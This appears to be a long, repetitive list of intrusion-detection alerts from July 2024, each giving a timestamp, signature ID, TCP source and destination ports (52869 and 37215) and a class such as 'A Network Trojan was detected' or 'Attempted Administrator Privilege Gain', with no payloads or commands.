                      Timestamp:07/20/24-23:06:54.833146
                      SID:2831300
                      Source Port:43062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.568828
                      SID:2025132
                      Source Port:53390
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:04.568777
                      SID:2027339
                      Source Port:49816
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.333210
                      SID:2025132
                      Source Port:39644
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.554912
                      SID:2829579
                      Source Port:37402
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.851101
                      SID:2027339
                      Source Port:52582
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:26.800191
                      SID:2025132
                      Source Port:57250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.021915
                      SID:2027339
                      Source Port:54678
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.804757
                      SID:2025132
                      Source Port:45654
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.933433
                      SID:2835222
                      Source Port:58102
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.536547
                      SID:2027339
                      Source Port:57080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.512424
                      SID:2027339
                      Source Port:39896
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.811975
                      SID:2027339
                      Source Port:32850
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.863090
                      SID:2829579
                      Source Port:59306
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.355198
                      SID:2027339
                      Source Port:59354
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.680161
                      SID:2829579
                      Source Port:50622
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.572173
                      SID:2831300
                      Source Port:40306
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:07:01.613026
                      SID:2025132
                      Source Port:54282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.114018
                      SID:2027339
                      Source Port:57476
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.620754
                      SID:2829579
                      Source Port:35112
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.692772
                      SID:2025132
                      Source Port:45962
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:42.136712
                      SID:2829579
                      Source Port:46322
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.109755
                      SID:2027339
                      Source Port:47094
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.451606
                      SID:2831300
                      Source Port:45372
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:06.434054
                      SID:2027339
                      Source Port:34950
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.705655
                      SID:2027339
                      Source Port:57532
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.281162
                      SID:2025132
                      Source Port:41060
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:23.347168
                      SID:2027339
                      Source Port:55684
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.859349
                      SID:2829579
                      Source Port:43164
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.252094
                      SID:2025132
                      Source Port:41486
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.069521
                      SID:2835222
                      Source Port:56582
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.265687
                      SID:2027339
                      Source Port:42898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.950380
                      SID:2829579
                      Source Port:54404
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.221844
                      SID:2829579
                      Source Port:55030
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.841499
                      SID:2829579
                      Source Port:41578
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.557113
                      SID:2027339
                      Source Port:55190
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.296189
                      SID:2025132
                      Source Port:39776
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.330485
                      SID:2831300
                      Source Port:41496
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:03.476247
                      SID:2829579
                      Source Port:35232
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:26.043403
                      SID:2831300
                      Source Port:60218
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.696605
                      SID:2025132
                      Source Port:59206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.815974
                      SID:2027339
                      Source Port:56836
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:27.421231
                      SID:2831300
                      Source Port:42924
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.326250
                      SID:2831300
                      Source Port:49348
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.161619
                      SID:2027339
                      Source Port:60900
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.858199
                      SID:2829579
                      Source Port:52850
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.497829
                      SID:2831300
                      Source Port:57214
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.035942
                      SID:2835222
                      Source Port:52532
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.994181
                      SID:2027339
                      Source Port:36386
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.421313
                      SID:2835222
                      Source Port:42430
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:27.648191
                      SID:2027339
                      Source Port:33710
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.574959
                      SID:2829579
                      Source Port:44546
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.256504
                      SID:2027339
                      Source Port:36194
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.821284
                      SID:2831300
                      Source Port:44672
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:09.588800
                      SID:2025132
                      Source Port:47318
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:15.999787
                      SID:2027339
                      Source Port:36240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.465013
                      SID:2027339
                      Source Port:48692
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.088778
                      SID:2829579
                      Source Port:49058
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.659617
                      SID:2835222
                      Source Port:36208
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.128631
                      SID:2027339
                      Source Port:52094
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.086216
                      SID:2829579
                      Source Port:48148
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.334607
                      SID:2025132
                      Source Port:53642
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:16.164913
                      SID:2831300
                      Source Port:59290
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:33.830570
                      SID:2835222
                      Source Port:56116
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.039093
                      SID:2829579
                      Source Port:49568
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.581239
                      SID:2027339
                      Source Port:50028
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.324397
                      SID:2829579
                      Source Port:53498
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.581538
                      SID:2835222
                      Source Port:56550
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.093934
                      SID:2831300
                      Source Port:36852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.445004
                      SID:2831300
                      Source Port:43962
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.445692
                      SID:2027339
                      Source Port:47516
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.947146
                      SID:2027339
                      Source Port:49722
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.105390
                      SID:2831300
                      Source Port:44836
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:34.622609
                      SID:2829579
                      Source Port:40842
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:18.662067
                      SID:2829579
                      Source Port:38868
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.325773
                      SID:2835222
                      Source Port:58860
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.524280
                      SID:2027339
                      Source Port:53766
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.125782
                      SID:2835222
                      Source Port:36054
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.983224
                      SID:2831300
                      Source Port:42278
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.498293
                      SID:2027339
                      Source Port:51308
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.860422
                      SID:2027339
                      Source Port:50342
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.551649
                      SID:2027339
                      Source Port:49670
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.500663
                      SID:2027339
                      Source Port:57804
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:21.718589
                      SID:2831300
                      Source Port:43462
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.470683
                      SID:2025132
                      Source Port:36562
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.934329
                      SID:2027339
                      Source Port:55918
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.982999
                      SID:2027339
                      Source Port:47178
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.610945
                      SID:2025132
                      Source Port:45068
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.577316
                      SID:2835222
                      Source Port:36772
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.408866
                      SID:2027339
                      Source Port:46510
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:34.791351
                      SID:2027339
                      Source Port:41062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.812176
                      SID:2831300
                      Source Port:47360
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.342606
                      SID:2025132
                      Source Port:36122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.513503
                      SID:2025132
                      Source Port:42376
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.285913
                      SID:2027339
                      Source Port:58854
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.782282
                      SID:2025132
                      Source Port:44674
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:42.135703
                      SID:2829579
                      Source Port:50950
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.317008
                      SID:2025132
                      Source Port:53700
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.758912
                      SID:2831300
                      Source Port:55328
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:07.310437
                      SID:2027339
                      Source Port:47348
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.042861
                      SID:2027339
                      Source Port:45878
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.377287
                      SID:2027339
                      Source Port:37142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:03.123324
                      SID:2027339
                      Source Port:35054
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.431582
                      SID:2025132
                      Source Port:44534
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:06.209030
                      SID:2831300
                      Source Port:39984
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:50.515352
                      SID:2829579
                      Source Port:49778
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.439088
                      SID:2027339
                      Source Port:53798
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.750662
                      SID:2027339
                      Source Port:51874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.953817
                      SID:2829579
                      Source Port:56910
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:55.981552
                      SID:2831300
                      Source Port:33480
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.913916
                      SID:2027339
                      Source Port:48322
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.708489
                      SID:2025132
                      Source Port:51434
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:09.741345
                      SID:2025132
                      Source Port:52874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:03.206868
                      SID:2025132
                      Source Port:52874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:02.655350
                      SID:2027339
                      Source Port:47420
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.109608
                      SID:2025132
                      Source Port:60960
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.342827
                      SID:2027339
                      Source Port:46968
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.775023
                      SID:2835222
                      Source Port:54518
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:53.637724
                      SID:2025132
                      Source Port:56146
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.361541
                      SID:2831300
                      Source Port:54854
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.333908
                      SID:2025132
                      Source Port:37722
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.807124
                      SID:2835222
                      Source Port:58450
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.563767
                      SID:2027339
                      Source Port:60768
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.646553
                      SID:2831300
                      Source Port:54636
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.830692
                      SID:2027339
                      Source Port:47790
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.681680
                      SID:2027339
                      Source Port:55716
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.929504
                      SID:2027339
                      Source Port:60666
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.458215
                      SID:2027339
                      Source Port:51276
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.132842
                      SID:2027339
                      Source Port:36402
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:26.028529
                      SID:2027339
                      Source Port:51024
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.467316
                      SID:2831300
                      Source Port:40776
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:42.220682
                      SID:2829579
                      Source Port:39900
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:19.828184
                      SID:2831300
                      Source Port:39990
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.963945
                      SID:2027339
                      Source Port:42862
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.836795
                      SID:2831300
                      Source Port:49868
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:11.223856
                      SID:2027339
                      Source Port:50078
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.945198
                      SID:2829579
                      Source Port:49132
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.421312
                      SID:2829579
                      Source Port:59226
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.284824
                      SID:2027339
                      Source Port:55740
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.338927
                      SID:2835222
                      Source Port:55064
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.221844
                      SID:2835222
                      Source Port:45788
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.752175
                      SID:2025132
                      Source Port:52508
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:42.245589
                      SID:2835222
                      Source Port:36064
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.324524
                      SID:2835222
                      Source Port:39704
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.678174
                      SID:2829579
                      Source Port:53658
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:50.167569
                      SID:2025132
                      Source Port:41372
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.520621
                      SID:2831300
                      Source Port:40514
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.044038
                      SID:2835222
                      Source Port:36706
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.498027
                      SID:2835222
                      Source Port:42948
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.522009
                      SID:2025132
                      Source Port:49852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:13.292975
                      SID:2027339
                      Source Port:34468
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:11.472742
                      SID:2829579
                      Source Port:46834
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:25.985417
                      SID:2025132
                      Source Port:36084
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:36.617416
                      SID:2831300
                      Source Port:49058
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:48.777005
                      SID:2829579
                      Source Port:45026
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:23.534447
                      SID:2831300
                      Source Port:52994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.441296
                      SID:2831300
                      Source Port:52642
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.875074
                      SID:2831300
                      Source Port:36758
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.445623
                      SID:2831300
                      Source Port:56838
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:48.788274
                      SID:2835222
                      Source Port:58314
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.443193
                      SID:2027339
                      Source Port:54752
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:18.458631
                      SID:2027339
                      Source Port:33878
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.526744
                      SID:2831300
                      Source Port:57006
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.930252
                      SID:2831300
                      Source Port:47188
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.323670
                      SID:2829579
                      Source Port:36390
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.447263
                      SID:2831300
                      Source Port:49860
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.246053
                      SID:2025132
                      Source Port:60836
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:27.674364
                      SID:2025132
                      Source Port:32966
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:06.465385
                      SID:2829579
                      Source Port:40416
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:23.212855
                      SID:2027339
                      Source Port:53734
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.325898
                      SID:2835222
                      Source Port:43376
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.108564
                      SID:2829579
                      Source Port:56248
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:18.422288
                      SID:2027339
                      Source Port:43376
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.433285
                      SID:2027339
                      Source Port:51754
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.353037
                      SID:2027339
                      Source Port:50438
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.452253
                      SID:2831300
                      Source Port:44552
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.844842
                      SID:2027339
                      Source Port:40892
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.888773
                      SID:2025132
                      Source Port:42110
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.326250
                      SID:2027339
                      Source Port:48094
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.478723
                      SID:2831300
                      Source Port:34028
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
